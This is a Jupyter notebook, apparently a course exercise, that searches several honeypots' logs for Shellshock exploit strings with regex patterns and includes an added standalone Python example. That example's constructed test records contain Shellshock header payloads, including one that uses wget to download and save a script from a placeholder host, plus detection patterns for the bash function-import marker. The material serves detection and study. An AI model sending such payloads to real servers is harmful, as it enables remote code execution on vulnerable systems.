Option E – Attack Method Detection Part 1

This option deals with creating a method to detect the following attack methods:  
**Chart and graph each of the following by date, broken down by source IP and country.**  
1. Search for strings containing the characters which are known to be used in a Shellshock exploit.  
2. Search for attempts where a website/webserver is being used that potentially hosts malware.  
3. Search for strings containing the characters which are known to be used in a directory traversal attack.  
4. Search for cross-site scripting (XSS) attacks.  
What types of threat actors are using the above attacks? Where are these attacks coming from? 

#### 1. Search for strings containing the characters which are known to be used in a Shellshock exploit.

In [1]:
%matplotlib inline

from IPython.display import display, HTML
display(HTML("<style>.container { width:90% !important; }</style>"))
import numpy as np
import pandas as pd
pd.set_option('display.max_columns', 100)
# 'display.height' no longer exists in pandas; max_rows is set inside chk3

In [2]:
tracker=[]


# define check function: run the regex `searchlist` over every free-text
# column of chkdf (index 8 onwards, i.e. after the timestamp/geo/ASN metadata),
# record each hit as [dataframe, pattern, column, count] in `arr`, and return
# the matching rows with the context columns needed for charting
def chk3(chkdf,  searchlist, dfname, arr=tracker):
    pd.set_option('display.max_rows', 500)
    found = []
    for i in range(8, len(chkdf.columns), 1):
        col = chkdf.columns[i]
        # na=False: a NaN cell is a non-match rather than a NaN in the mask
        result = chkdf[chkdf.iloc[:,i].str.contains(searchlist, regex=True, na=False)]
        if len(result) != 0:
            print("Found <",searchlist,"> in column <", col,"> count",len(result))
            arr.append([dfname,searchlist,col,len(result)])
            # keep collecting: a payload can sit in more than one column
            found.append(result[['timestamp','source_ip','country','asn',col]])
    if found:
        return pd.concat(found)
    return None
            

In [3]:
# list of regex patterns i'm searching for (raw strings, so the backslashes reach re unchanged)
# https://twitter.com/cyb3rops/status/515801861086248960?lang=en

mylist = [r'\:\;',   # loose: any ':;' substring; also fires on ordinary strings such as passwords
          # Apache combined-log line, written without the /.../ delimiters, which Python's re would treat as literal characters
          r'^(\S+) (\S+) (\S+) \[([^:]+):(\d+:\d+:\d+) ([^]]+)\] "(\S+)(?: ((?:[^"]|\\")*) (\S+))?" (\S+) (\S+) "((?:[^"]|\\")*)" "((?:[^"]|\\")*)"$',
          r'\(\)\s*\t*\{.*;\s*\}\s*;'   # bash function import "() { :; };" carried by a Shellshock request
         ]
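Added example, not code from the notebook: the Shellshock check run over a handful of constructed request records in plain Python (no pandas), so it runs stand-alone. It applies two of the patterns above and shows what the loose `:;` pattern does that the function-definition pattern does not: it flags a password containing `:;` and misses a payload whose function body has no colon. `count_by_date_country` produces the per-day, per-country series this option asks to chart. The field names, records and RFC 5737 addresses are all constructed.

```python
"""Shellshock marker search over honeypot-style request records.

Added example, not from the notebook: plain Python (no pandas) so it runs
stand-alone. Records, field names and addresses are constructed; the IPs
are RFC 5737 documentation addresses.
"""
import re
from collections import Counter

# Two of the notebook's patterns. The first is the bash function-import
# marker "() { :; };" that a Shellshock (CVE-2014-6271) request carries in
# some attacker-controlled header; the second (":;") is deliberately loose
# and is included to show where it over- and under-matches.
PATTERNS = {
    "shellshock_funcdef": re.compile(r"\(\)\s*\t*\{.*;\s*\}\s*;"),
    "loose_colon_semi": re.compile(r":;"),
}

# Fields a web honeypot such as shockpot logs per request (assumed names);
# the attacker controls every one of them, so all are searched.
SEARCH_FIELDS = ("User Agent", "Cookie", "Referer", "credentials")

# Constructed sample records, not real honeypot data.
RECORDS = [
    {"timestamp": "2014-09-25 10:01:02", "source_ip": "203.0.113.7", "country": "US",
     "User Agent": "() { :; }; /bin/bash -c 'wget http://203.0.113.7/x.sh -O /tmp/x.sh'",
     "Cookie": "", "Referer": "", "credentials": ""},
    {"timestamp": "2014-09-25 11:45:30", "source_ip": "198.51.100.9", "country": "CN",
     "User Agent": "Mozilla/5.0 (X11; Linux x86_64)",
     "Cookie": "() { :;}; /bin/ping -c 1 198.51.100.9",
     "Referer": "", "credentials": ""},
    {"timestamp": "2014-09-26 02:13:44", "source_ip": "203.0.113.7", "country": "US",
     "User Agent": "Mozilla/5.0 (compatible; scanner)", "Cookie": "",
     "Referer": "() { ignored; }; /bin/bash -c 'echo vulnerable'",  # no ':' in the body
     "credentials": ""},
    {"timestamp": "2014-09-26 08:00:00", "source_ip": "192.0.2.44", "country": "DE",
     "User Agent": "curl/7.35.0", "Cookie": "sid=abc123", "Referer": "",
     "credentials": "root:;admin123"},  # ':;' inside a password, not an exploit
    {"timestamp": "2014-09-26 09:30:00", "source_ip": "192.0.2.44", "country": "DE",
     "User Agent": "Mozilla/5.0", "Cookie": "", "Referer": "http://example.com/",
     "credentials": "admin:admin"},
]


def scan_records(records, patterns=PATTERNS, fields=SEARCH_FIELDS):
    """One hit per (record, field, pattern) whose value matches the pattern."""
    hits = []
    for rec in records:
        for field in fields:
            value = rec.get(field) or ""
            for name, rx in patterns.items():
                if rx.search(value):
                    hits.append({"timestamp": rec["timestamp"],
                                 "source_ip": rec["source_ip"],
                                 "country": rec["country"],
                                 "field": field, "pattern": name, "value": value})
    return hits


def count_by_date_country(hits, pattern="shellshock_funcdef"):
    """Hits keyed by (date, country): the series to chart per day and country."""
    return Counter((h["timestamp"][:10], h["country"])
                   for h in hits if h["pattern"] == pattern)


def count_by_source_ip(hits, pattern="shellshock_funcdef"):
    """Hits per source IP, for ranking the noisiest scanners."""
    return Counter(h["source_ip"] for h in hits if h["pattern"] == pattern)


def loose_only(hits):
    """Values flagged by the loose ':;' pattern but not by the function-definition
    pattern: the candidates to review by hand before counting them as attacks."""
    strict = {(h["timestamp"], h["field"])
              for h in hits if h["pattern"] == "shellshock_funcdef"}
    return [h for h in hits
            if h["pattern"] == "loose_colon_semi"
            and (h["timestamp"], h["field"]) not in strict]


if __name__ == "__main__":
    hits = scan_records(RECORDS)
    for h in hits:
        print(f'{h["timestamp"]} {h["source_ip"]:<13} {h["country"]} '
              f'{h["pattern"]:<19} {h["field"]}: {h["value"][:60]}')
    print("by date/country:", dict(count_by_date_country(hits)))
    print("by source IP:", dict(count_by_source_ip(hits)))
    print("loose-only (review):", [h["value"] for h in loose_only(hits)])
```

On the constructed records the function-definition pattern finds three requests across two days and two countries, while `:;` flags the `root:;admin123` credential and overlooks the `() { ignored; };` payload. That is the same behaviour as the single Cowrie `credentials` hit reported below: a `:;` hit outside an HTTP header is worth a manual look before it is charted as Shellshock.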

***
### Cowrie

In [4]:
cowrie_tracker=[]


dfc = pd.read_csv("sorted-cowrie.csv",sep='\t',dtype='str')

dfc=dfc[['timestamp','channel','source_ip','destination_port',
        'protocol','city','country','asn', 'commands', 'loggedin',
       'version', 'ttylog', 'urls', 'session', 'payload_startTime',
       'payload_endTime', 'credentials']]

dfc_1 = pd.DataFrame()
for ix in mylist:
    dfc_1 = pd.concat([dfc_1,chk3(dfc,ix,'Cowrie',cowrie_tracker)]).reset_index(drop=True)
if not dfc_1.empty:
    dfc_1 = dfc_1.drop_duplicates()
else:
    print("Dataframe Empty")

Found < \:\; > in column < credentials > count 1


***
### Dionaea (empty omit)

In [5]:
dfd = pd.read_csv("sorted-dionaea.csv",sep='\t',dtype='str')
dfd=dfd[['timestamp','channel','source_ip','destination_port',
        'protocol','city','country','asn', 'remote_hostname',
       'connection_transport', 'connection_type']]

dfd_1 = pd.DataFrame()
for ix in mylist:
    dfd_1 = pd.concat([dfd_1,chk3(dfd,ix,'Dionaea')]).reset_index(drop=True)
if not dfd_1.empty:
    dfd_1 = dfd_1.drop_duplicates()
else:
    print("Dataframe Empty")

Dataframe Empty


***
### Elastic

In [6]:
dfe = pd.read_csv("sorted-elastichoney.csv",sep='\t',dtype='str')
dfe=dfe[['timestamp','channel','source_ip','destination_port',
        'protocol','city','country','asn','method','type',
        'URL','form','user_agent','Payload Connection','Payload','Payload Resource','Payload MD5']]

dfe_1 = pd.DataFrame()
for ix in mylist:
    dfe_1 = pd.concat([dfe_1,chk3(dfe,ix,'Elastic')]).reset_index(drop=True)
if not dfe_1.empty:
    dfe_1 = dfe_1.drop_duplicates()
else:
    print("Dataframe Empty")

Dataframe Empty


***
### Glastopf

In [7]:
dfg = pd.read_csv("sorted-glastopf.csv",sep='\t',dtype='str')
dfg=dfg[['timestamp','channel','source_ip','destination_port',
        'protocol','city','country','asn','Version','pattern',
        'filename','request_raw','request_url']]
dfg_1 = pd.DataFrame()
for ix in mylist:
    dfg_1 = pd.concat([dfg_1,chk3(dfg,ix,'Glastopf')]).reset_index(drop=True)
if not dfg_1.empty:
    dfg_1 = dfg_1.drop_duplicates()
else:
    print("Dataframe Empty")

Dataframe Empty


***
### Shockpot

In [8]:
dfs = pd.read_csv("sorted-shockpot.csv",sep='\t', lineterminator='\r',dtype='str')
dfs = dfs.loc[:,['timestamp','source_ip',
       'city', 'province', 'province_code', 'country', 'country_code','asn', 'method', 'path', 'URL',
       'query_string', 'Authorization', 'Content-Type', 'Cookie', 'Host', 'Connection',
       'Te', 'Accept-Encoding', 'User Agent', 'X_Forwarded_For',
       'X_Requested_With', 'is-shellshock']].fillna("")
dfs = dfs.drop(dfs.index[5284])

dfs_1 = pd.DataFrame()
for ix in mylist:
    dfs_1 = pd.concat([dfs_1,chk3(dfs,ix,'shockpot')]).reset_index(drop=True)
if not dfs_1.empty:
    dfs_1 = dfs_1.drop_duplicates()
else:
    print("Dataframe Empty")

Dataframe Empty


***
### Word (empty omit)

In [9]:
dfw = pd.read_csv("sorted-wordpot.csv",sep='\t',dtype='str')

dfw=dfw[['timestamp','channel','source_ip','destination_port',
        'protocol','city','country','asn', 'URL', 'filename',
       'user_agent', 'User Name', 'Password']]

dfw_1 = pd.DataFrame()
for ix in mylist:
    dfw_1 = pd.concat([dfw_1,chk3(dfw,ix,'Word')]).reset_index(drop=True)
if not dfw_1.empty:
    dfw_1 = dfw_1.drop_duplicates()
else:
    print("Dataframe Empty")

Dataframe Empty
